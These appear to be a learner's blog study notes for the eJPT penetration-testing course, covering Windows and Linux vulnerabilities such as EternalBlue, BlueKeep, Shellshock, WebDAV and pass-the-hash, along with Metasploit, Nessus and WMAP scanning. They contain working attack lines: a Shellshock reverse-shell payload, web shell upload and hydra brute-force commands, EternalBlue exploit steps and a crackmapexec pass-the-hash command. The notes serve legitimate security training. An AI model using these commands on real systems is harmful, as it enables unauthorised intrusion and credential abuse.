eJPT - 1.4 Vulnerability Assessment
HmadWindows Vulnerabilities
Has been the dominant OS worldwide for a while
Vulnerabilities ranging from MS08-067 to MS17-010
Has various OS versions and releases, makes the threat surface fragmented
They share a likeness given the development and philosophy:
Developed in C++ making them vulnerable to buffer overflows, arbitrary code execution, etc.
Not configured to run securely by default
Newly discovered vulnerabilities are not immediately patched by Microsoft
Vulnerable to cross platform vulnerabilities (like SQL injection attacks)
Also vulnerable to physical attacks
As for the types of Windows vulnerabilities, some of the categories are:
| Category | Description |
| Information disclosure | Vulnerability that allows an attacker to access confidential data |
| Buffer overflows | Caused by a programming error which allows attackers to write to a buffer and overrun the buffer to write data to allocated memory addresses |
| Remote code execution | Vulnerability that allows an attacker to remotely execute code on a target |
| Privilege escalation | Vulnerability that allows an attacker to elevate their privileges after initial compromise |
| DOS attack | Vulnerability that allows an attacker to consume a system's resources consequently preventing the system from functioning normally |
Frequently Exploited Services
Windows has various native services and protocols. These services provide an attacker with an access vector that they can utilize to gain access to a target host.
| Service | Ports | Purpose |
| IIS | 80, 443 | Proprietary web server software |
| WebDAV | 80, 443 | HTTP extension that allows clients to update, delete, move and copy files on a web server. It's used to enable a web server to act as a file server |
| SMB | 445 | Network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a LAN |
| RDP | 3389 | Proprietary GUI remote access protocol to remotely authenticate and interact with a Windows system |
| WinRM | 5986, 443 | Remote management protocol that can be used to facilitate remote access with Windows systems |
Scanning With Metasploit
Vulnerability scanning it to scan a system for vulnerabilities and verifying whether they can be exploited. We will be mainly using auxiliary and exploit Metasploit modules to scan and identify inherent vulnerabilities in services, OS, and web applications.
You can search for exploits within Metasploit using:
search type:exploit name:(your search)
To search for Metasploit framework exploit modules from within a Kali terminal:
searchsploit "your search" | grep -e "Metasploit"
One very useful tool is metasploit-autopwn. It's available on GitHub here.
To download the tool:
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
To move it into the metasploit framework
cd metasploit-autopwn
mv db_autopwn.rb /usr/share/metasploit-framework/plugins
To load it within metasploit:
load db_autopwn
db_autopwn -p -t -PI
We can also use the analyze command to analyse an IP within the Metasploit framework for vulnerabilities which it has detected for which exploits are available.
WebDAV Vulnerabilities
Microsoft IIS (Internet Information Services) is a web server software developed by Windows. It can be used to host website or web apps and provides admins with a GUI to manage websites. It can be used to host both static and dynamic web pages developed in ASP.NET and PHP. Normally runs on port 80 and 443.
The supported executable file extensions for IIS are:
.asp.aspx.config.php
WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manages files on remote web servers. It runs on top of Microsoft IIS on ports 80 and 443.
In order to connect to a WebDAV server, you have to provide credentials because it implements authentication (username and password). To exploit:
Identify whether WebDAV is running on IIS or Apache
Perform a brute-force attack to identify legitimate credentials to use for authentication
Authenticate with WebDAV
Upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target
One of the tools we can use to exploit WebDAV is Davtest. Davtest is a scanner that will upload a directory and then it sends files with all different types of extensions to the WebDAV server and tries to execute them. It will then list out the file extensions that work this helps us know which web shell executable file to use against the WebDAV server.
davtest -auth username:password -url http://targetip/webdav
Another tool is cadaver. It's used for uploading, editing and moving files on a WebDAV server. We will use it to upload a web shell to the target IP address.
cadaver http://targetip/webdav
put /usr/share/webshells/asp/webshell.asp
(In other cases, where php is accepted, we can use that webshell instead of asp)
To brute-force credentials using hydra:
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt (target ip) http-get /webdav/
CVE-2017-0144 EternalBlue
The Windows SMB vulnerability EternalBlue (MS17-010 / CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.
It was developed by the NSA and then leaked to the public by a hacker group called the Shadow Brokers in 2017. It takes advantage of a vulnerability in the SMBv1 protocol that allows attackers to send specially crafted packets that allow to get a meterpreter session or a reverse shell.
It was used in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.
It affects multiple versions of Windows:
Windows Vista
Windows 7
Windows Server 2008
Windows 8.1
Windows Server 2012
Windows 10 (only a certain build)
Windows Server 2016
Microsoft released patch for vulnerability in 2017 but many systems and companies have not yet patched their systems. It has an MSF auxiliary module that can be used to check if a target system is vulnerable to the exploit. It also has an exploit module that can be used to exploit the vulnerability on unpatched systems.
The auxiliary module - smb_ms17_010
The exploit module - ms17_010_eternalblue
You can also manually exploit the vulnerability by utilizing publicly available exploits. To exploit it manually, it's called AutoBlue-MS17-010 and can be found here.
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py (target ip) shellcode/sc_x64.bin
You can check if a system is vulnerable to this attack via Nmap:
nmap -sV -p445 --script=smb-vuln-ms17-010 (target ip)
Tip to set up a netcat listener:
nc -nvlp (the port you are listening on)
CVE-2019-0708 BlueKeep
The Windows RDP vulnerability BlueKeep (CVE-2019-0708) is the name given to a vulnerability that can potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system. It was made public by Microsoft in May 2019 alongside which they released a patch for companies to repair. When discovered, about 1 million systems were vulnerable.
This exploit takes advantage of a vulnerability in the Windows RDP protocol that allows attackers to gain access to the kernel memory and execute code remotely at the system level without needing authentication.
It affects multiple versions of Windows:
XP
Vista
Windows 7
Windows Server 2008 & R2
It has many various illegitimate proof of concepts and exploit code that could be malicious in nature and is therefore recommended to only use verified exploit code and modules for exploitation. It has an auxiliary and exploit module that can be used to exploit unpatched systems.
The auxiliary module - cve_2019_0708_bluekeep The exploit module - cve_2019_0708_bluekeep_rce
Note that targeting Kernel space memory and applications will and can cause crashes. To avoid this, you want to be very careful and reduce the space that you are exploiting.
Pass-the-Hash Attacks
It is an exploitation technique that involves capturing or harvesting NTLM hashes or clear-text passwords and utilizing them to authenticate with the target legitimately. This will allow us to gain access as opposed to obtaining access via service exploitation.
We can use the Metasploit PsExec module or the Crackmapexec tool to do this. You need the LM hash as well as the NTLM hash to do this.
The exploit module within Metasploit is:
exploit/windows/smb/psexec
set SMBUser (username)
set SMBPass (LM_hash:NTLM_hash)
You will have to set a target to get a meterpreter session.
crackmapexec smb (target ip) -u (username) -H "NTLM Hash" -X "any command you'd like to run"
Linux Vulnerabilities
Linux is a free and open-source OS that is comprised of the Linux kernel, and the GNU toolkit. Linux has various use-cases but it's typically deployed as a server operating system.
For this reason, there are specific services and protocols that will typically be found running on a Linux server. These services provide an attacker with an access vector that they can utilize to gain access to a target host.
Frequently Exploited Services
| Service | Ports | Purpose |
| Apache | 80, 443 | Free, open-source cross-platform web server. Accounts for over 80% of web servers globally. |
| SSH | 22 | Secure way to remotely access and control system over an unsecured network. Successor to Telnet. |
| FTP | 21 | Used to facilitate file sharing |
| SAMBA | 445 | Linux implementation of SMB |
CVE-2014-6271 Shellshock
The Linux Bash vulnerability Shellshock (CVE-2014-6271) is the name given to a vulnerability that is found in the Bash shell (since V1.3) that allow an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell. It was discovered by Stephane Chazelas on 12/09/2014 and was made public on 24/09/2014.
Bash is a Nix shell that is part of the GNU project and is the default shell for most Linux distributions. This vulnerability is caused by Bash whereby Bash executes trailing commands after a series of characters: (){:;};. This only affects Linux as Windows is not based on Nix.
In the context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack. CGI (Common Gateway Interface) scripts are used by Apache to execute arbitrary commands on the Linux system after which the output is display to the client.
In order to exploit it, you will need to locate an input vector or script that allows you to communicate with Bash. In the context on an Apache web server, we can utilize any legitimate CGI scripts accessible on the web server. Whenever a CGI script is executed, the web server will initiate a new process and run the CGI script with Bash.
Whenever we make a new HTTP request with a CGI script, then the server will run it with Bash so we can essentially input those characters within the User-Agent HTTP header followed by any other commands. It can be exploited manually or automatically with an exploit module.
We can check if an Apache web server is vulnerable to this attack using Nmap. Replace the /gettime.cgi with the path of the CGI script on the web server you are performing this on.
nmap -sV (target ip) --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
To exploit this, we need to have FoxyProxy enabled on Firefox to send traffic to Burp Suite. Then go to the tab, Proxy, and ensure that the intercept is on. Now, reload the page with the CGI script and send the traffic to the Repeater. Then delete the User-Agent information, and replace it with the following. You can replace the reverse shell information with any command.
() { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/your_ip/listen_port 0>&1'
To exploit this with the Metasploit framework, it has an auxiliary and exploit module. To run this, set the RHOSTS value to the target IP address and the TARGETURI value to the URL where the CGI file is running (in this case, it's /gettime.cgi). Also set the LHOST option to your IP address. Once this is done, you will have a meterpreter session.
The auxiliary module - apache_mod_cgi_bash_env
The exploit module - apache_mod_cgi_bash_env_exec
Vulnerability Scanning
Nessus
It's a proprietary vulnerability scanner developed by Tenable. We can perform a scan on a target system which we can then import into Metasploit for analysis and exploitation. It automates the process of identifying vulnerabilities and provides us with information pertinent to a vulnerability like the CVE code.
There is a paid and free version of Nessus. The free version allows us to scan up to 16 IP addresses. We can access the link here and you can register for free to get the activation code.
Once you've completed a scan with Nessus, you can export the results as a .nessus file. We can then import this into the Metasploit framework using db_import. We can then go through these results and look for CVE codes. Then we can search for exploit modules using those CVE codes:
search cve:(enter the year) name:(the service)
Alternatively, within the Nessus framework on the web, we can use the filter to filter out the results where Metasploit exploit modules are available. We can click on it and find the specific module name to run and gain a meterpreter session on the target.
WMAP
WMAP is a tool which we use to web application vulnerability scanning. It can be used to automate web server enumeration. It's available as an MSF plugin and can be loaded directly into MSF. It can be integrated within the Metasploit Framework Database.
To load WMAP within Metasploit:
worskspace -a Web_Scan
load wmap
To add a site to scan:
wmap_sites -a (target ip)
To set up our target:
wmap_targets -t http://(target_ip)/
To search for useful auxiliary modules for our target:
wmap_run -t
To then run those auxiliary modules:
wmap_run -e
To list out the vulnerabilities that wmap has found:
wmap_vulns -l
We can use the module http_put to test whether or not we can upload a file to a directory. If we can, then it can be exploited by uploading a malicious file.
That’s it for this section. Next one up is the CTF or skill check that iNE has put up.
— Hmad
Subscribe to my newsletter
Read articles from Hmad directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
Hmad
Hmad
I'm a cybersecurity enthusiast with a growing focus on offensive security. Currently studying for the eJPT & ICCA, building hands-on projects like Infiltr8, and sharing everything I learn through blog posts and labs.